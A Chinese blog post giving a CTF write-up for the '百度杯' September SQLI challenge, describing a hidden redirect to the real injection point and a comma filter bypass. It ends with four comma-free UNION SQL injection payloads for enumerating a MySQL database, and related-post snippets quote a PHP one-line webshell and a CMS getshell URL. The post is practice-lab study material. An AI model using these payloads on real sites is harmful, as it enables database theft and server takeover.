“百度杯”CTF比赛 九月场 SQLI

最新推荐文章于 2021-04-04 09:08:23 发布
最新推荐文章于 2021-04-04 09:08:23 发布
阅读量308 收藏
点赞数
分类专栏: CTF之Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wyj_1216/article/details/89052742
版权

题目来源

i春秋题库

题目

writeup

1、一开始进去,啥都没有,那就查看页面源代码看看吧

1
发现了login.php?id=1

2、于是,进入到此页面看看

2
尝试进行注入,发现,并不是真正的注入点。

3、那就一起来找一下注入点吧

这里有个很坑的地方!!!

存在跳转!!!

具体发现方法,我也是拜读了大佬的博客才发现的

4

5
注意看上面两张图片,

发现了隐藏起来的关键点:l0gin.php?id=1

进入看看,发现注入点

6

7

3、开始注入

这里又是一个很坑很坑的点!!!

尝试注入,发现逗号之后过滤掉了

8
于是,又拜读了大佬的博客,发现了一种,无逗号的注入法~

再次开始注入~

9得到数据库名:sqli

10得到表名:users

11找到flag所在

12得出flag!

后话

此题值得纪念,两个坑,齐齐掉了下去~

纪念一下,无需逗号的注入语句~

?id=-1' union select * from (select group_concat(distinct(table_schema)) from information_schema.tables ) a join (select version() ) b %23
?id=-1' union select * from (select group_concat(distinct(table_name)) from information_schema.tables where table_schema = 'database()' ) a join (select version() ) b %23
?id=-1' union select * from (select group_concat(distinct(column_name)) from information_schema.tables where table_name = 'tablename' ) a join (select version() ) b %23
?id=-1' union select * from (select group_concat(distinct(flag_name)) from tablename ) a join (select version() ) b %23
白衣w
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
百度CTF比赛 九月——Code
Ifish的博客
08-07 2658
题目描述 解题思路 1、打开题目链接,看到url,感觉应该是文件包含 查看源码,看到了图片的base64编码 2、感觉思路比较清晰,构造 index.php?jpg=index.php,查看源码,得到base64编码,解码,得到index.php的源码 <?php /** * Created by PhpStorm. * Date: 2015/11/16...
百度CTF比赛 九月 123
drip_big的博客
04-15 427
百度CTF比赛 九月 123 题目内容: 12341234,然后就解开了 这次题目内容真的就是一点用也没有 1 爆破 进去就是一个登入界面,看到啥也没想开始尝试注入,直到后来失败多次看了源码: 所以写ctf一进来就看源码真的是个好习惯 <!-- 用户信息都在user.php里 --> <!-- 用户默认默认密码为用户名+出生日期 例如:zhangwei19...
百度CTF比赛 九月 SQLi
weixin_43858799的博客
05-19 753
1、打开题目 一篇空白 发现一直在loading 还以为是网卡没加载 刷新几遍之后 发现原来都是套路 2、根据提示flag在后台 用bp抓包进行测试 看到 login.php?id=1 通过URL进行访问 发现没有什么可以用的信息 再用bp抓包 也灭有可以用信息 最后实在没办法了 看了官方的WP 才知道存在index.php 文件 并在hearder中有提示 通过URL访问...
百度CTF比赛 九月SQLi(多种姿势)
u011250160的博客
04-04 417
上题 进入网站,发现提示 按照提示访问http://91ad046335104584a1cc3f4e3a83513688ef3757714748d4.changame.ichunqiu.com/login.php?id=1 没有什么有用的信息 使用burpsuite抓包看下 同样没有什么有用的信息 用dirsearch扫下敏感目录 访问robots.txt出现nothing here 访问config.php没有得到信息 访问login.php得到error 访问index.php跳转到开始的load
百度CTF比赛 九月 SQL-writeup
wyj_1216 House
04-05 623
题目来源: “百度CTF比赛 九月 SQL(i春秋CTF题库) http://5a2ac0925dcc43de96dd1453e3b6c1e348f7b2c59f7c4fbd.changame.ichunqiu.com/index.php?id=1 writeup 1、判断有无注入点 发现,有过滤,尝试许多,参考大神思路,发现<>绕过and过滤 继续判断注入点有无 发现无...
百度CTF比赛 九月 SQLi
feng的博客
09-11 305
这题主要涉及SQL注入的相关知识,涉及的绕过是过滤了逗号后面的语句
百度CTF比赛(十二月)
Root__Liu的博客
04-13 4100
"百度"CTF比赛(十二月) 第一 1、传说中的签到题 解决:把二进制用在线进制转换器转换,发现转为10进制时,和tips2一样,在qq上一查,是CTF官方群,在公告里有一个字符串ZmxhZ3tiMTU5MDI4Yy05NWZmLTRmNzEtYWQ3Yi1jZWY1MTBhMjJkMDB9 用base64解码,得到flag, flag{b159028c-95ff-4f
百度CTF比赛 九月--web Upload
hanjinrui15的博客
12-30 643
百度CTF比赛 九月--web Upload基础知识1、什么是一句话木马?2、一句话木马的简要原理3、html渲染过程解析渲染该过程主要分为以下步骤:解决方案:4、PHP中substr()函数解题思路1、代码分析2、求解题目总结 基础知识 1、什么是一句话木马? 最简单的理解就是,一句话木马上传到网站后台,然后我们可以通过提交参数等的方式去获取shell,比如拿菜刀或者蚁剑等工具。比如下面这段php一句话木马: <?php @eval($_POST['key']) ?> 【基本原理
百度CTF比赛 九月 YeserCMS 详细解析
drip_big的博客
04-14 829
百度CTF比赛 九月 YeserCMS 详细解析 看题解的,对每个关键步骤做出详细注释 题目内容: 新的CMS系统,帮忙测测是否有漏洞。 1 第一步就是了解这是什么cms 百度YeserCMS,没有相关CMS,应该是改了名字。 在网站内找一找,没看到哪里有标志信息,一下几种方式可以辨认 直接用浏览器搜索cms指纹识别 搜索 “手机版 - 购物车 - 留言 - 繁体 - ...
i春秋 “百度CTF比赛 九月 XSS平台
include_heqile的博客
09-10 4793
https://www.ichunqiu.com/battalion?t=1 这道题是一道代码审计题,对于我这个萌新来说,不看大佬们的writeup是根本无从下手的,得到的提示就是github上的开源项目Rtiny:https://github.com/r0ker/Rtiny-xss/tree/master 大佬们是通过构造非法参数来让网页返回错误信息的,如下: 然后就可以搜索到这个项目...
百度CTF比赛 九月 Upload解题思路
qq_43473164的博客
05-16 1805
Hello,大家好,我是锘锘鸡。 今天分享给大家的是百度CTF比赛的Upload解题思路。 先看下题目 提示flag就在flag.php中。 进入答题链接 发现是文件上传,于是好奇的锘锘鸡开始了他的第一波操作"题下留名",证明自己来过 上传成功后,锘锘鸡惊奇的发现,上传成功在html中是在a标签中的,而且直接链接到文件目录下。 锘锘鸡试着点开!!!click… 嗯??… 锘锘鸡电灯泡一...
百度CTF比赛 九月SQLi ---------mozhe
weixin_40709439的博客
08-25 1480
题目链接:https://www.ichunqiu.com/battalion 点击进去,查看源代码  发现login.php?id=1 一般是存在sql注入的,可是我测试了好几遍,sqlmap也跑过了,也没发现啥 没办法,查看了官方wp,说是存在index.php,并在其header头有真正的注入点 在index.php请求进行301重定向,明显发现上面的链接只差一个字母,...
百度CTF比赛 九月-----Test
大方子
08-02 1401
========================================= 个人收获: 1.连接shell 失败的时候可以试试多个版本的菜刀,可能是菜刀的问题 2.学会了菜刀数据库管理的配置 ============================================ 题目界面: 这个是个cms,我就直接百度查询到现成的漏洞 漏洞地址:http://0day5...
[百度] 九月第二周 Sqli writeup
Flyour的博客
04-01 1806
这道sql注入题折磨了我相当久,痛哭流涕啊! 拿到题,访问url: http://90fefcf9ed494886b66499d44a5b4f7466e12887e8b44c96.game.ichunqiu.com/b68a89d1c4a097a9d8631b3ac45e8979.php 老套路,先看源码,提示 login.php?id=1 ,心里想着都是套路,然后访问url: http:...
百度CTF比赛 九月---123
weixin_30411997的博客
04-07 138
右键查看源代码 然后构造user.php,显示空白,源码也是空白,既然上边说用户名,密码了,参考大佬的博客,放文件user.php.bak这是备份文件,一打开上边全是用户名,有戏,爆破 添加字典,也就是那个备份文件 爆出了一个结果,用户名lixiuyun,密码lixiuyun1990 登陆不显示,查看源码 大佬不愧是大佬,自己都想不到,本地构造个html,来绕过漏...
i春秋 “百度CTF比赛 九月 SQL
include_heqile的博客
09-12 1401
https://www.ichunqiu.com/battalion?t=1&amp;r=0 看题目就知道这是一道注入题,这道题其实并没有什么难度,主要就是select、union、=等被过滤了,我们需要找到一种有效的绕过方法,这道题的绕过方法就是在敏感字符串中间加上&lt;&gt;,这个是通过提交各种特殊字符串并查看源代码得到的,当我们提交了&lt;&gt;之后,再去查看源代码,会发现源代码界...
百度CTF比赛 九月
andiao1218的博客
03-23 148
Test: 题目提示查资料 打开地址,是一个海洋cms 海洋cms有个前台getshell的漏洞 在地址后加上/search.php?searchtype=5&tid=&area=eval($_POST[x]),用菜刀连接,密码为x 连接后还是找不到flag,可能flag在数据库里 找找数据库的配置文件 用菜刀连接数据库 ...
百度CTF比赛 九月 SQL
SPS98
11-02 301
先放下参考链接:大方子的WP 还有自己以前写的mysql注入 —— union 平台那边的题目是这样的 很明确说是SQL注入,然后打开容器 很明显是要对id进行注入, 先不着急注入, 把id值变换看看 表面看上去只有两条数据的样子 那就先试下常用操作, 在1后面加个' 没有反应, 应该是出错或者屏蔽报错, 再加个#看看 依旧没反应, 再去掉' 从而可以推测出查询语句应该是sele...
百度CTF比赛 九月 SQL
weixin_43858799的博客
05-19 251
1、打开题目 提示flag通过注入拿到 2、开始常规的进行SQL注入 输入‘ order by 1 发现被过滤了 字符&&和||替换进行替换and 和or 发现没有显示过滤 发现order by被拦截 同样注释/**/也会被拦截。尝试用<>把字符隔 开。这里需要注意or<>der隔开是不对的,因为or又是一个被拦截的字符 所以使用 1’ o<&...
福建闽盾 ctf比赛题目
最新发布
08-26
福建闽盾CTF比赛题目是指“福建”和“闽盾”这两个关键词所组成的CTF比赛的题目。CTF(Capture The Flag,夺旗赛)是一种网络安全竞赛,旨在考验选手在网络攻防和信息安全方面的技能。 福建作为一个华南沿海...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值